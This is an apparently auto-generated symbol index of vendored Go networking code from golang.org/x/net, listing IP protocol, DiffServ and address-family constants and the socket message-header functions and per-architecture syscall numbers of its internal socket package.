DiffServCS0 (line 9) | DiffServCS0 = 0x00 constant DiffServCS1 (line 10) | DiffServCS1 = 0x20 constant DiffServCS2 (line 11) | DiffServCS2 = 0x40 constant DiffServCS3 (line 12) | DiffServCS3 = 0x60 constant DiffServCS4 (line 13) | DiffServCS4 = 0x80 constant DiffServCS5 (line 14) | DiffServCS5 = 0xa0 constant DiffServCS6 (line 15) | DiffServCS6 = 0xc0 constant DiffServCS7 (line 16) | DiffServCS7 = 0xe0 constant DiffServAF11 (line 17) | DiffServAF11 = 0x28 constant DiffServAF12 (line 18) | DiffServAF12 = 0x30 constant DiffServAF13 (line 19) | DiffServAF13 = 0x38 constant DiffServAF21 (line 20) | DiffServAF21 = 0x48 constant DiffServAF22 (line 21) | DiffServAF22 = 0x50 constant DiffServAF23 (line 22) | DiffServAF23 = 0x58 constant DiffServAF31 (line 23) | DiffServAF31 = 0x68 constant DiffServAF32 (line 24) | DiffServAF32 = 0x70 constant DiffServAF33 (line 25) | DiffServAF33 = 0x78 constant DiffServAF41 (line 26) | DiffServAF41 = 0x88 constant DiffServAF42 (line 27) | DiffServAF42 = 0x90 constant DiffServAF43 (line 28) | DiffServAF43 = 0x98 constant DiffServEF (line 29) | DiffServEF = 0xb8 constant DiffServVOICEADMIT (line 30) | DiffServVOICEADMIT = 0xb0 constant NotECNTransport (line 31) | NotECNTransport = 0x00 constant ECNTransport1 (line 32) | ECNTransport1 = 0x01 constant ECNTransport0 (line 33) | ECNTransport0 = 0x02 constant CongestionExperienced (line 34) | CongestionExperienced = 0x03 constant ProtocolIP (line 39) | ProtocolIP = 0 constant ProtocolHOPOPT (line 40) | ProtocolHOPOPT = 0 constant ProtocolICMP (line 41) | ProtocolICMP = 1 constant ProtocolIGMP (line 42) | ProtocolIGMP = 2 constant ProtocolGGP (line 43) | ProtocolGGP = 3 constant ProtocolIPv4 (line 44) | ProtocolIPv4 = 4 constant ProtocolST (line 45) | ProtocolST = 5 constant ProtocolTCP (line 46) | ProtocolTCP = 6 constant ProtocolCBT (line 47) | ProtocolCBT = 7 constant ProtocolEGP (line 48) | ProtocolEGP = 8 constant ProtocolIGP (line 49) | ProtocolIGP = 9 constant ProtocolBBNRCCMON (line 50) | ProtocolBBNRCCMON = 10 constant ProtocolNVPII (line 51) | ProtocolNVPII = 11 constant ProtocolPUP (line 52) | ProtocolPUP = 12 constant ProtocolEMCON (line 53) | ProtocolEMCON = 14 constant ProtocolXNET (line 54) | ProtocolXNET = 15 constant ProtocolCHAOS (line 55) | ProtocolCHAOS = 16 constant ProtocolUDP (line 56) | ProtocolUDP = 17 constant ProtocolMUX (line 57) | ProtocolMUX = 18 constant ProtocolDCNMEAS (line 58) | ProtocolDCNMEAS = 19 constant ProtocolHMP (line 59) | ProtocolHMP = 20 constant ProtocolPRM (line 60) | ProtocolPRM = 21 constant ProtocolXNSIDP (line 61) | ProtocolXNSIDP = 22 constant ProtocolTRUNK1 (line 62) | ProtocolTRUNK1 = 23 constant ProtocolTRUNK2 (line 63) | ProtocolTRUNK2 = 24 constant ProtocolLEAF1 (line 64) | ProtocolLEAF1 = 25 constant ProtocolLEAF2 (line 65) | ProtocolLEAF2 = 26 constant ProtocolRDP (line 66) | ProtocolRDP = 27 constant ProtocolIRTP (line 67) | ProtocolIRTP = 28 constant ProtocolISOTP4 (line 68) | ProtocolISOTP4 = 29 constant ProtocolNETBLT (line 69) | ProtocolNETBLT = 30 constant ProtocolMFENSP (line 70) | ProtocolMFENSP = 31 constant ProtocolMERITINP (line 71) | ProtocolMERITINP = 32 constant ProtocolDCCP (line 72) | ProtocolDCCP = 33 constant Protocol3PC (line 73) | Protocol3PC = 34 constant ProtocolIDPR (line 74) | ProtocolIDPR = 35 constant ProtocolXTP (line 75) | ProtocolXTP = 36 constant ProtocolDDP (line 76) | ProtocolDDP = 37 constant ProtocolIDPRCMTP (line 77) | ProtocolIDPRCMTP = 38 constant ProtocolTPPP (line 78) | ProtocolTPPP = 39 constant ProtocolIL (line 79) | ProtocolIL = 40 constant ProtocolIPv6 (line 80) | ProtocolIPv6 = 41 constant ProtocolSDRP (line 81) | ProtocolSDRP = 42 constant ProtocolIPv6Route (line 82) | ProtocolIPv6Route = 43 constant ProtocolIPv6Frag (line 83) | ProtocolIPv6Frag = 44 constant ProtocolIDRP (line 84) | ProtocolIDRP = 45 constant ProtocolRSVP (line 85) | ProtocolRSVP = 46 constant ProtocolGRE (line 86) | ProtocolGRE = 47 constant ProtocolDSR (line 87) | ProtocolDSR = 48 constant ProtocolBNA (line 88) | ProtocolBNA = 49 constant ProtocolESP (line 89) | ProtocolESP = 50 constant ProtocolAH (line 90) | ProtocolAH = 51 constant ProtocolINLSP (line 91) | ProtocolINLSP = 52 constant ProtocolNARP (line 92) | ProtocolNARP = 54 constant ProtocolMOBILE (line 93) | ProtocolMOBILE = 55 constant ProtocolTLSP (line 94) | ProtocolTLSP = 56 constant ProtocolSKIP (line 95) | ProtocolSKIP = 57 constant ProtocolIPv6ICMP (line 96) | ProtocolIPv6ICMP = 58 constant ProtocolIPv6NoNxt (line 97) | ProtocolIPv6NoNxt = 59 constant ProtocolIPv6Opts (line 98) | ProtocolIPv6Opts = 60 constant ProtocolCFTP (line 99) | ProtocolCFTP = 62 constant ProtocolSATEXPAK (line 100) | ProtocolSATEXPAK = 64 constant ProtocolKRYPTOLAN (line 101) | ProtocolKRYPTOLAN = 65 constant ProtocolRVD (line 102) | ProtocolRVD = 66 constant ProtocolIPPC (line 103) | ProtocolIPPC = 67 constant ProtocolSATMON (line 104) | ProtocolSATMON = 69 constant ProtocolVISA (line 105) | ProtocolVISA = 70 constant ProtocolIPCV (line 106) | ProtocolIPCV = 71 constant ProtocolCPNX (line 107) | ProtocolCPNX = 72 constant ProtocolCPHB (line 108) | ProtocolCPHB = 73 constant ProtocolWSN (line 109) | ProtocolWSN = 74 constant ProtocolPVP (line 110) | ProtocolPVP = 75 constant ProtocolBRSATMON (line 111) | ProtocolBRSATMON = 76 constant ProtocolSUNND (line 112) | ProtocolSUNND = 77 constant ProtocolWBMON (line 113) | ProtocolWBMON = 78 constant ProtocolWBEXPAK (line 114) | ProtocolWBEXPAK = 79 constant ProtocolISOIP (line 115) | ProtocolISOIP = 80 constant ProtocolVMTP (line 116) | ProtocolVMTP = 81 constant ProtocolSECUREVMTP (line 117) | ProtocolSECUREVMTP = 82 constant ProtocolVINES (line 118) | ProtocolVINES = 83 constant ProtocolTTP (line 119) | ProtocolTTP = 84 constant ProtocolIPTM (line 120) | ProtocolIPTM = 84 constant ProtocolNSFNETIGP (line 121) | ProtocolNSFNETIGP = 85 constant ProtocolDGP (line 122) | ProtocolDGP = 86 constant ProtocolTCF (line 123) | ProtocolTCF = 87 constant ProtocolEIGRP (line 124) | ProtocolEIGRP = 88 constant ProtocolOSPFIGP (line 125) | ProtocolOSPFIGP = 89 constant ProtocolSpriteRPC (line 126) | ProtocolSpriteRPC = 90 constant ProtocolLARP (line 127) | ProtocolLARP = 91 constant ProtocolMTP (line 128) | ProtocolMTP = 92 constant ProtocolAX25 (line 129) | ProtocolAX25 = 93 constant ProtocolIPIP (line 130) | ProtocolIPIP = 94 constant ProtocolSCCSP (line 131) | ProtocolSCCSP = 96 constant ProtocolETHERIP (line 132) | ProtocolETHERIP = 97 constant ProtocolENCAP (line 133) | ProtocolENCAP = 98 constant ProtocolGMTP (line 134) | ProtocolGMTP = 100 constant ProtocolIFMP (line 135) | ProtocolIFMP = 101 constant ProtocolPNNI (line 136) | ProtocolPNNI = 102 constant ProtocolPIM (line 137) | ProtocolPIM = 103 constant ProtocolARIS (line 138) | ProtocolARIS = 104 constant ProtocolSCPS (line 139) | ProtocolSCPS = 105 constant ProtocolQNX (line 140) | ProtocolQNX = 106 constant ProtocolAN (line 141) | ProtocolAN = 107 constant ProtocolIPComp (line 142) | ProtocolIPComp = 108 constant ProtocolSNP (line 143) | ProtocolSNP = 109 constant ProtocolCompaqPeer (line 144) | ProtocolCompaqPeer = 110 constant ProtocolIPXinIP (line 145) | ProtocolIPXinIP = 111 constant ProtocolVRRP (line 146) | ProtocolVRRP = 112 constant ProtocolPGM (line 147) | ProtocolPGM = 113 constant ProtocolL2TP (line 148) | ProtocolL2TP = 115 constant ProtocolDDX (line 149) | ProtocolDDX = 116 constant ProtocolIATP (line 150) | ProtocolIATP = 117 constant ProtocolSTP (line 151) | ProtocolSTP = 118 constant ProtocolSRP (line 152) | ProtocolSRP = 119 constant ProtocolUTI (line 153) | ProtocolUTI = 120 constant ProtocolSMP (line 154) | ProtocolSMP = 121 constant ProtocolPTP (line 155) | ProtocolPTP = 123 constant ProtocolISIS (line 156) | ProtocolISIS = 124 constant ProtocolFIRE (line 157) | ProtocolFIRE = 125 constant ProtocolCRTP (line 158) | ProtocolCRTP = 126 constant ProtocolCRUDP (line 159) | ProtocolCRUDP = 127 constant ProtocolSSCOPMCE (line 160) | ProtocolSSCOPMCE = 128 constant ProtocolIPLT (line 161) | ProtocolIPLT = 129 constant ProtocolSPS (line 162) | ProtocolSPS = 130 constant ProtocolPIPE (line 163) | ProtocolPIPE = 131 constant ProtocolSCTP (line 164) | ProtocolSCTP = 132 constant ProtocolFC (line 165) | ProtocolFC = 133 constant ProtocolRSVPE2EIGNORE (line 166) | ProtocolRSVPE2EIGNORE = 134 constant ProtocolMobilityHeader (line 167) | ProtocolMobilityHeader = 135 constant ProtocolUDPLite (line 168) | ProtocolUDPLite = 136 constant ProtocolMPLSinIP (line 169) | ProtocolMPLSinIP = 137 constant ProtocolMANET (line 170) | ProtocolMANET = 138 constant ProtocolHIP (line 171) | ProtocolHIP = 139 constant ProtocolShim6 (line 172) | ProtocolShim6 = 140 constant ProtocolWESP (line 173) | ProtocolWESP = 141 constant ProtocolROHC (line 174) | ProtocolROHC = 142 constant ProtocolReserved (line 175) | ProtocolReserved = 255 constant AddrFamilyIPv4 (line 180) | AddrFamilyIPv4 = 1 constant AddrFamilyIPv6 (line 181) | AddrFamilyIPv6 = 2 constant AddrFamilyNSAP (line 182) | AddrFamilyNSAP = 3 constant AddrFamilyHDLC (line 183) | AddrFamilyHDLC = 4 constant AddrFamilyBBN1822 (line 184) | AddrFamilyBBN1822 = 5 constant AddrFamily802 (line 185) | AddrFamily802 = 6 constant AddrFamilyE163 (line 186) | AddrFamilyE163 = 7 constant AddrFamilyE164 (line 187) | AddrFamilyE164 = 8 constant AddrFamilyF69 (line 188) | AddrFamilyF69 = 9 constant AddrFamilyX121 (line 189) | AddrFamilyX121 = 10 constant AddrFamilyIPX (line 190) | AddrFamilyIPX = 11 constant AddrFamilyAppletalk (line 191) | AddrFamilyAppletalk = 12 constant AddrFamilyDecnetIV (line 192) | AddrFamilyDecnetIV = 13 constant AddrFamilyBanyanVines (line 193) | AddrFamilyBanyanVines = 14 constant AddrFamilyE164withSubaddress (line 194) | AddrFamilyE164withSubaddress = 15 constant AddrFamilyDNS (line 195) | AddrFamilyDNS = 16 constant AddrFamilyDistinguishedName (line 196) | AddrFamilyDistinguishedName = 17 constant AddrFamilyASNumber (line 197) | AddrFamilyASNumber = 18 constant AddrFamilyXTPoverIPv4 (line 198) | AddrFamilyXTPoverIPv4 = 19 constant AddrFamilyXTPoverIPv6 (line 199) | AddrFamilyXTPoverIPv6 = 20 constant AddrFamilyXTPnativemodeXTP (line 200) | AddrFamilyXTPnativemodeXTP = 21 constant AddrFamilyFibreChannelWorldWidePortName (line 201) | AddrFamilyFibreChannelWorldWidePortName = 22 constant AddrFamilyFibreChannelWorldWideNodeName (line 202) | AddrFamilyFibreChannelWorldWideNodeName = 23 constant AddrFamilyGWID (line 203) | AddrFamilyGWID = 24 constant AddrFamilyL2VPN (line 204) | AddrFamilyL2VPN = 25 constant AddrFamilyMPLSTPSectionEndpointID (line 205) | AddrFamilyMPLSTPSectionEndpointID = 26 constant AddrFamilyMPLSTPLSPEndpointID (line 206) | AddrFamilyMPLSTPLSPEndpointID = 27 constant AddrFamilyMPLSTPPseudowireEndpointID (line 207) | AddrFamilyMPLSTPPseudowireEndpointID = 28 constant AddrFamilyMTIPv4 (line 208) | AddrFamilyMTIPv4 = 29 constant AddrFamilyMTIPv6 (line 209) | AddrFamilyMTIPv6 = 30 constant AddrFamilyEIGRPCommonServiceFamily (line 210) | AddrFamilyEIGRPCommonServiceFamily = 16384 constant AddrFamilyEIGRPIPv4ServiceFamily (line 211) | AddrFamilyEIGRPIPv4ServiceFamily = 16385 constant AddrFamilyEIGRPIPv6ServiceFamily (line 212) | AddrFamilyEIGRPIPv6ServiceFamily = 16386 constant AddrFamilyLISPCanonicalAddressFormat (line 213) | AddrFamilyLISPCanonicalAddressFormat = 16387 constant AddrFamilyBGPLS (line 214) | AddrFamilyBGPLS = 16388 constant AddrFamily48bitMAC (line 215) | AddrFamily48bitMAC = 16389 constant AddrFamily64bitMAC (line 216) | AddrFamily64bitMAC = 16390 constant AddrFamilyOUI (line 217) | AddrFamilyOUI = 16391 constant AddrFamilyMACFinal24bits (line 218) | AddrFamilyMACFinal24bits = 16392 constant AddrFamilyMACFinal40bits (line 219) | AddrFamilyMACFinal40bits = 16393 constant AddrFamilyIPv6Initial64bits (line 220) | AddrFamilyIPv6Initial64bits = 16394 constant AddrFamilyRBridgePortID (line 221) | AddrFamilyRBridgePortID = 16395 constant AddrFamilyTRILLNickname (line 222) | AddrFamilyTRILLNickname = 16396 FILE: vendor/golang.org/x/net/internal/socket/cmsghdr.go method len (line 9) | func (h *cmsghdr) len() int { return int(h.Len) } method lvl (line 10) | func (h *cmsghdr) lvl() int { return int(h.Level) } method typ (line 11) | func (h *cmsghdr) typ() int { return int(h.Type) } FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_bsd.go method set (line 9) | func (h *cmsghdr) set(l, lvl, typ int) { FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_linux_32bit.go method set (line 9) | func (h *cmsghdr) set(l, lvl, typ int) { FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_linux_64bit.go method set (line 9) | func (h *cmsghdr) set(l, lvl, typ int) { FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_solaris_64bit.go method set (line 9) | func (h *cmsghdr) set(l, lvl, typ int) { FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_stub.go function controlHeaderLen (line 9) | func controlHeaderLen() int { function controlMessageLen (line 13) | func controlMessageLen(dataLen int) int { function controlMessageSpace (line 17) | func controlMessageSpace(dataLen int) int { type cmsghdr (line 21) | type cmsghdr struct method len (line 23) | func (h *cmsghdr) len() int { return 0 } method lvl (line 24) | func (h *cmsghdr) lvl() int { return 0 } method typ (line 25) | func (h *cmsghdr) typ() int { return 0 } method set (line 27) | func (h *cmsghdr) set(l, lvl, typ int) {} FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_unix.go function controlHeaderLen (line 11) | func controlHeaderLen() int { function controlMessageLen (line 15) | func controlMessageLen(dataLen int) int { function controlMessageSpace (line 19) | func controlMessageSpace(dataLen int) int { FILE: vendor/golang.org/x/net/internal/socket/cmsghdr_zos_s390x.go method set (line 7) | func (h *cmsghdr) set(l, lvl, typ int) { FILE: vendor/golang.org/x/net/internal/socket/complete_dontwait.go function ioComplete (line 15) | func ioComplete(flags int, operr error) bool { FILE: vendor/golang.org/x/net/internal/socket/complete_nodontwait.go function ioComplete (line 15) | func ioComplete(flags int, operr error) bool { FILE: vendor/golang.org/x/net/internal/socket/error_unix.go function errnoErr (line 19) | func errnoErr(errno syscall.Errno) error { FILE: vendor/golang.org/x/net/internal/socket/error_windows.go function errnoErr (line 16) | func errnoErr(errno syscall.Errno) error { FILE: vendor/golang.org/x/net/internal/socket/iovec_32bit.go method set (line 11) | func (v *iovec) set(b []byte) { FILE: vendor/golang.org/x/net/internal/socket/iovec_64bit.go method set (line 11) | func (v *iovec) set(b []byte) { FILE: vendor/golang.org/x/net/internal/socket/iovec_solaris_64bit.go method set (line 11) | func (v *iovec) set(b []byte) { FILE: vendor/golang.org/x/net/internal/socket/iovec_stub.go type iovec (line 9) | type iovec struct method set (line 11) | func (v *iovec) set(b []byte) {} FILE: vendor/golang.org/x/net/internal/socket/mmsghdr_stub.go type mmsghdr (line 11) | type mmsghdr struct type mmsghdrs (line 13) | type mmsghdrs method pack (line 15) | func (hs mmsghdrs) pack(ms []Message, parseFn func([]byte, string) (ne... method unpack (line 19) | func (hs mmsghdrs) unpack(ms []Message, parseFn func([]byte, string) (... FILE: vendor/golang.org/x/net/internal/socket/mmsghdr_unix.go type mmsghdrs (line 16) | type mmsghdrs method unpack (line 18) | func (hs mmsghdrs) unpack(ms []Message, parseFn func([]byte, string) (... type mmsghdrsPacker (line 35) | type mmsghdrsPacker struct method prepare (line 47) | func (p *mmsghdrsPacker) prepare(ms []Message) { method pack (line 71) | func (p *mmsghdrsPacker) pack(ms []Message, parseFn func([]byte, strin... type syscaller (line 100) | type syscaller struct method init (line 110) | func (r *syscaller) init() { method recvmmsg (line 115) | func (r *syscaller) recvmmsg(c syscall.RawConn, hs mmsghdrs, flags int... method recvmmsgF (line 129) | func (r *syscaller) recvmmsgF(s uintptr) bool { method sendmmsg (line 134) | func (r *syscaller) sendmmsg(c syscall.RawConn, hs mmsghdrs, flags int... method sendmmsgF (line 148) | func (r *syscaller) sendmmsgF(s uintptr) bool { type mmsgTmps (line 154) | type mmsgTmps struct type mmsgTmpsPool (line 169) | type mmsgTmpsPool struct method Get (line 173) | func (p *mmsgTmpsPool) Get() *mmsgTmps { method Put (line 193) | func (p *mmsgTmpsPool) Put(tmps *mmsgTmps) { FILE: vendor/golang.org/x/net/internal/socket/msghdr_bsd.go method pack (line 11) | func (h *msghdr) pack(vs []iovec, bs [][]byte, oob []byte, sa []byte) { method name (line 26) | func (h *msghdr) name() []byte { method controllen (line 33) | func (h *msghdr) controllen() int { method flags (line 37) | func (h *msghdr) flags() int { FILE: vendor/golang.org/x/net/internal/socket/msghdr_bsdvar.go method setIov (line 9) | func (h *msghdr) setIov(vs []iovec) { FILE: vendor/golang.org/x/net/internal/socket/msghdr_linux.go method pack (line 9) | func (h *msghdr) pack(vs []iovec, bs [][]byte, oob []byte, sa []byte) { method name (line 23) | func (h *msghdr) name() []byte { method controllen (line 30) | func (h *msghdr) controllen() int { method flags (line 34) | func (h *msghdr) flags() int { FILE: vendor/golang.org/x/net/internal/socket/msghdr_linux_32bit.go method setIov (line 11) | func (h *msghdr) setIov(vs []iovec) { method setControl (line 20) | func (h *msghdr) setControl(b []byte) { FILE: vendor/golang.org/x/net/internal/socket/msghdr_linux_64bit.go method setIov (line 11) | func (h *msghdr) setIov(vs []iovec) { method setControl (line 20) | func (h *msghdr) setControl(b []byte) { FILE: vendor/golang.org/x/net/internal/socket/msghdr_openbsd.go method setIov (line 7) | func (h *msghdr) setIov(vs []iovec) { FILE: vendor/golang.org/x/net/internal/socket/msghdr_solaris_64bit.go method pack (line 11) | func (h *msghdr) pack(vs []iovec, bs [][]byte, oob []byte, sa []byte) { method controllen (line 29) | func (h *msghdr) controllen() int { method flags (line 33) | func (h *msghdr) flags() int { FILE: vendor/golang.org/x/net/internal/socket/msghdr_stub.go type msghdr (line 9) | type msghdr struct method pack (line 11) | func (h *msghdr) pack(vs []iovec, bs [][]byte, oob []byte, sa []byte) {} method name (line 12) | func (h *msghdr) name() []byte ... method controllen (line 13) | func (h *msghdr) controllen() int ... method flags (line 14) | func (h *msghdr) flags() int ... FILE: vendor/golang.org/x/net/internal/socket/msghdr_zos_s390x.go method pack (line 11) | func (h *msghdr) pack(vs []iovec, bs [][]byte, oob []byte, sa []byte) { method controllen (line 29) | func (h *msghdr) controllen() int { method flags (line 33) | func (h *msghdr) flags() int { FILE: vendor/golang.org/x/net/internal/socket/norace.go method raceRead (line 9) | func (m *Message) raceRead() { method raceWrite (line 11) | func (m *Message) raceWrite() { FILE: vendor/golang.org/x/net/internal/socket/race.go method raceRead (line 18) | func (m *Message) raceRead() { method raceWrite (line 28) | func (m *Message) raceWrite() { FILE: vendor/golang.org/x/net/internal/socket/rawconn.go type Conn (line 15) | type Conn struct type tcpConn (line 22) | type tcpConn interface type udpConn (line 31) | type udpConn interface type ipConn (line 40) | type ipConn interface function NewConn (line 48) | func NewConn(c net.Conn) (*Conn, error) { method get (line 70) | func (o *Option) get(c *Conn, b []byte) (int, error) { method set (line 82) | func (o *Option) set(c *Conn, b []byte) error { FILE: vendor/golang.org/x/net/internal/socket/rawconn_mmsg.go method recvMsgs (line 13) | func (c *Conn) recvMsgs(ms []Message, flags int) (int, error) { method sendMsgs (line 34) | func (c *Conn) sendMsgs(ms []Message, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/rawconn_msg.go method recvMsg (line 14) | func (c *Conn) recvMsg(m *Message, flags int) error { method sendMsg (line 40) | func (c *Conn) sendMsg(m *Message, flags int) error { FILE: vendor/golang.org/x/net/internal/socket/rawconn_nommsg.go method recvMsgs (line 9) | func (c *Conn) recvMsgs(ms []Message, flags int) (int, error) { method sendMsgs (line 13) | func (c *Conn) sendMsgs(ms []Message, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/rawconn_nomsg.go method recvMsg (line 9) | func (c *Conn) recvMsg(m *Message, flags int) error { method sendMsg (line 13) | func (c *Conn) sendMsg(m *Message, flags int) error { FILE: vendor/golang.org/x/net/internal/socket/socket.go type Option (line 19) | type Option struct method Get (line 27) | func (o *Option) Get(c *Conn, b []byte) (int, error) { method GetInt (line 40) | func (o *Option) GetInt(c *Conn) (int, error) { method Set (line 65) | func (o *Option) Set(c *Conn, b []byte) error { method SetInt (line 78) | func (o *Option) SetInt(c *Conn, v int) error { function ControlMessageSpace (line 94) | func ControlMessageSpace(dataLen int) int { type ControlMessage (line 105) | type ControlMessage method Data (line 109) | func (m ControlMessage) Data(dataLen int) []byte { method Next (line 120) | func (m ControlMessage) Next(dataLen int) ControlMessage { method MarshalHeader (line 130) | func (m ControlMessage) MarshalHeader(lvl, typ, dataLen int) error { method ParseHeader (line 141) | func (m ControlMessage) ParseHeader() (lvl, typ, dataLen int, err erro... method Marshal (line 152) | func (m ControlMessage) Marshal(lvl, typ int, data []byte) (ControlMes... method Parse (line 168) | func (m ControlMessage) Parse() ([]ControlMessage, error) { function NewControlMessage (line 210) | func NewControlMessage(dataLen []int) ControlMessage { type Message (line 219) | type Message struct method RecvMsg (line 246) | func (c *Conn) RecvMsg(m *Message, flags int) error { method SendMsg (line 254) | func (c *Conn) SendMsg(m *Message, flags int) error { method RecvMsgs (line 266) | func (c *Conn) RecvMsgs(ms []Message, flags int) (int, error) { method SendMsgs (line 278) | func (c *Conn) SendMsgs(ms []Message, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys.go function init (line 15) | func init() { FILE: vendor/golang.org/x/net/internal/socket/sys_bsd.go function recvmmsg (line 9) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 13) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_const_unix.go constant sysAF_UNSPEC (line 12) | sysAF_UNSPEC = unix.AF_UNSPEC constant sysAF_INET (line 13) | sysAF_INET = unix.AF_INET constant sysAF_INET6 (line 14) | sysAF_INET6 = unix.AF_INET6 constant sysSOCK_RAW (line 16) | sysSOCK_RAW = unix.SOCK_RAW constant sizeofSockaddrInet4 (line 18) | sizeofSockaddrInet4 = unix.SizeofSockaddrInet4 constant sizeofSockaddrInet6 (line 19) | sizeofSockaddrInet6 = unix.SizeofSockaddrInet6 FILE: vendor/golang.org/x/net/internal/socket/sys_linux.go function recvmmsg (line 14) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 19) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_linux_386.go constant sysRECVMMSG (line 13) | sysRECVMMSG = 0x13 constant sysSENDMMSG (line 14) | sysSENDMMSG = 0x14 function socketcall (line 17) | func socketcall(call, a0, a1, a2, a3, a4, a5 uintptr) (uintptr, syscall.... function rawsocketcall (line 18) | func rawsocketcall(call, a0, a1, a2, a3, a4, a5 uintptr) (uintptr, sysca... function recvmmsg (line 20) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 25) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_linux_amd64.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x12b constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x133 FILE: vendor/golang.org/x/net/internal/socket/sys_linux_arm.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x16d constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x176 FILE: vendor/golang.org/x/net/internal/socket/sys_linux_arm64.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0xf3 constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x10d FILE: vendor/golang.org/x/net/internal/socket/sys_linux_loong64.go constant sysRECVMMSG (line 10) | sysRECVMMSG = 0xf3 constant sysSENDMMSG (line 11) | sysSENDMMSG = 0x10d FILE: vendor/golang.org/x/net/internal/socket/sys_linux_mips.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x10ef constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x10f7 FILE: vendor/golang.org/x/net/internal/socket/sys_linux_mips64.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x14ae constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x14b6 FILE: vendor/golang.org/x/net/internal/socket/sys_linux_mips64le.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x14ae constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x14b6 FILE: vendor/golang.org/x/net/internal/socket/sys_linux_mipsle.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x10ef constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x10f7 FILE: vendor/golang.org/x/net/internal/socket/sys_linux_ppc.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x157 constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x15d FILE: vendor/golang.org/x/net/internal/socket/sys_linux_ppc64.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x157 constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x15d FILE: vendor/golang.org/x/net/internal/socket/sys_linux_ppc64le.go constant sysRECVMMSG (line 8) | sysRECVMMSG = 0x157 constant sysSENDMMSG (line 9) | sysSENDMMSG = 0x15d FILE: vendor/golang.org/x/net/internal/socket/sys_linux_riscv64.go constant sysRECVMMSG (line 10) | sysRECVMMSG = 0xf3 constant sysSENDMMSG (line 11) | sysSENDMMSG = 0x10d FILE: vendor/golang.org/x/net/internal/socket/sys_linux_s390x.go constant sysRECVMMSG (line 13) | sysRECVMMSG = 0x13 constant sysSENDMMSG (line 14) | sysSENDMMSG = 0x14 function socketcall (line 17) | func socketcall(call, a0, a1, a2, a3, a4, a5 uintptr) (uintptr, syscall.... function rawsocketcall (line 18) | func rawsocketcall(call, a0, a1, a2, a3, a4, a5 uintptr) (uintptr, sysca... function recvmmsg (line 20) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 25) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_netbsd.go constant sysRECVMMSG (line 13) | sysRECVMMSG = 0x1db constant sysSENDMMSG (line 14) | sysSENDMMSG = 0x1dc function recvmmsg (line 17) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 22) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_posix.go function marshalInetAddr (line 22) | func marshalInetAddr(a net.Addr, b []byte) int { function marshalSockaddr (line 35) | func marshalSockaddr(ip net.IP, port int, zone string, b []byte) int { function parseInetAddr (line 66) | func parseInetAddr(b []byte, network string) (net.Addr, error) { type ipv6ZoneCache (line 112) | type ipv6ZoneCache struct method update (line 127) | func (zc *ipv6ZoneCache) update(ift []net.Interface, force bool) (upda... method name (line 152) | func (zc *ipv6ZoneCache) name(zone int) string { method index (line 169) | func (zc *ipv6ZoneCache) index(zone string) int { FILE: vendor/golang.org/x/net/internal/socket/sys_stub.go constant sysAF_UNSPEC (line 12) | sysAF_UNSPEC = 0x0 constant sysAF_INET (line 13) | sysAF_INET = 0x2 constant sysAF_INET6 (line 14) | sysAF_INET6 = 0xa constant sysSOCK_RAW (line 16) | sysSOCK_RAW = 0x3 constant sizeofSockaddrInet4 (line 18) | sizeofSockaddrInet4 = 0x10 constant sizeofSockaddrInet6 (line 19) | sizeofSockaddrInet6 = 0x1c function marshalInetAddr (line 22) | func marshalInetAddr(ip net.IP, port int, zone string) []byte { function parseInetAddr (line 26) | func parseInetAddr(b []byte, network string) (net.Addr, error) { function getsockopt (line 30) | func getsockopt(s uintptr, level, name int, b []byte) (int, error) { function setsockopt (line 34) | func setsockopt(s uintptr, level, name int, b []byte) error { function recvmsg (line 38) | func recvmsg(s uintptr, buffers [][]byte, oob []byte, flags int, network... function sendmsg (line 42) | func sendmsg(s uintptr, buffers [][]byte, oob []byte, to net.Addr, flags... function recvmmsg (line 46) | func recvmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { function sendmmsg (line 50) | func sendmmsg(s uintptr, hs []mmsghdr, flags int) (int, error) { FILE: vendor/golang.org/x/net/internal/socket/sys_unix.go function syscall_getsockopt (line 17) | func syscall_getsockopt(s, level, name int, val unsafe.Pointer, vallen *... function syscall_setsockopt (line 20) | func syscall_setsockopt(s, level, name int, val 